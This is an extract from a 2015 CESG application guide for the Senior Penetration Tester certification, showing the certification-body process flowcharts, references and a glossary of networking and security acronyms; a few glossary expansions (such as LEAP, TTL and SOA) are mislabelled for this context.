This Application Guidance contains material designed to help individuals applying for Senior Practitioner Penetration Tester. The certification processes for the different CBs follow below. Note:
1. If you are considering applying for the Principal level, you will need to show wider experience of more complex systems and satisfy the requirement for higher specialist skill levels – see http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx. Consultancy experience would also be appropriate.
2. If you are considering applying for the Lead level, you will need to show that you influence and direct the penetration testing function at an organisational or inter-organisational level and satisfy the requirement for higher specialist skill levels. For example, you directly and regularly brief or advise a Directors’ Board in this regard. See http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx.
3. There are 3 CBs: the APM Group (www.apmg-ia.com ), BCS, The Chartered Institute for IT (www.bcs.org ) and the IISP, RHUL & CREST Consortium (www.iisp.org ). Certification is for 3 years and requires evidence of continuing professional development throughout the period of certification.
Page 32
Application Guidance – CCP Penetration Tester Role, Senior Level
APMGCREST Registered Pen
Tester
Cyber Scheme Team Member
TIGER Scheme Qualified Security Tester
GCHQ Senior Pen Tester
Apply online
Written
submission
Personal evaluation
Technical evaluation
Interview
Certification decision
End of certification process
Senior Penetration Tester certification
process - APMG
Page 33
Application Guidance – CCP Penetration Tester Role, Senior Level
BCS
CREST Registered
Pen Tester
Cyber Scheme Team Member
TIGER Scheme Qualified Security Tester
GCHQ Senior Pen Tester
apply online
written submission
assessment
interview
certification decision
End of Certification Process
Senior Penetration Tester certification
process - BCS
Page 34
Application Guidance – CCP Penetration Tester Role, Senior Level
IISP
CREST Registered
Pen Tester
Cyber Scheme Team Member
TIGER Scheme Qualified Security Tester
GCHQ Senior Pen Tester
apply online
written submission
assessment
interview
Recommendation
& certification
decision
End of Certification Process
Senior Penetration Tester certification
process - IISP
Page 35
Application Guidance – CCP Penetration Tester Role, Senior Level
The CCP Scheme Certification Learning Cycle
If there is a gap against CCP requirements, make a time-bounded plan to develop skills and knowledge, with suitable opportunities to apply them
Page 36
Application Guidance - CCP Penetration Tester Role,
Senior Level
References
[a] CESG Certification for IA Professionals. Available from: http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx
[b] Guidance to CESG Certification for IA Professionals. Available from: http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx
Page 37
Application Guidance - CCP Penetration Tester Role,
Senior Level
Glossary
AES Advanced Encryption Standard
API Application Programming Interface
ARP Address Resolution Protocol
BGP Border Gateway Protocol
BIOS Basic Input Output System
CDP Cisco Discovery Protocol
CHECK IT Health Check Service
CNAME Canonical Name Record
CVSS Common Vulnerability Scoring System
DES Data Encryption Standard
DHCP Dynamic Host Configuration Protocol
DMZ Demilitarized Zone (firewall configuration)
DNS Domain Name System
EAP Extensible Authentication Protocol
EGP Exterior Gateway Protocol
EIGRP Enhanced Interior Gateway Routing Protocol
FTP File Transfer Protocol
GID Group Identifier
HINFO Host Information
HMACs Hashed MACs
HSRP Hot Standby Router Protocol
HTML Hyper Text Mark Up Language
HTTP Hypertext Transfer Protocol
HTTPS communications protocol for secure communication over a computer
network
ICMP Internet Control Message Protocol
IGMP Internet Group Management Protocol
IGRP Interior Gateway Routing Protocol
IPSEC Internet Protocol Security
LEAP Programming language
LDAP Lightweight Directory Access Protocol
Page 38
Application Guidance - CCP Penetration Tester Role,
Senior Level
MACs Message Authentication Codes
MD5 Message Digest algorithm – cryptographic hash function
MIB Management Information Base
MX Mail Exchanges
NetBIOS Network Basic Input/Output System
NFS Network File System
NS Name Server (implements a name service protocol)
NTP Network Time Protocol
OSPF Open Shortest Path First
OWASP Open Web Application Security Project
PEAP Protected Extensible Authentication Protocol
PGP Pretty Good Privacy
PTR Pointer record
PXE Preboot execution environment
RIP Routing Information Protocol
RPC Remote Procedure Call
RSA public key cryptosystem (named after its authors)
SHA1 Secure Hash Algorithm – cryptographic hash function
SIP Session Initiation Protocol
SMTP Simple Mail Transfer Protocol
SNMP Simple Network Management Protocol
SOA Service Oriented Architecture
SOAP Simple Object Access Protocol
SQL Structured Query Language
SSH Secure Shell
SSL Secure Sockets Layer
STP Straight through Processing
SUID Set Owner User ID up
TACACS Terminal Access Controller Access-Control System Plus
TCP Transmission Control Protocol
TFTP Trivial File Transfer Protocol
TKIP Temporal Key Integrity Protocol
TPM Trusted Platform Module
Page 39
Application Guidance - CCP Penetration Tester Role,
Senior Level
TTL Transistor-Transistor Logic
TXT Text file
UDP User Datagram Protocol
UID User Identifier
URL Uniform Resource Locator
VOIP Voice Over Internet Protocol
VRRP Virtual Router Redundancy Protocol
VTP VLAN (Virtual Local Area Networks) Trunking Protocol
WEP Wired Equivalent Privacy
WPA Wifi-protected access
WSUS Windows Server Update Services
XML Extensible Mark Up Language
IA CESG A2i Hubble Road Cheltenham Gloucestershire GL51 0EX Tel: +44 (0)1242 709141 Fax: +44 (0)1242 709193 Email: [email protected] © Crown Copyright 2015. Communications on CESG telecommunications systems may be monitored or recorded to secure the effective operation of the system and for other lawful purposes.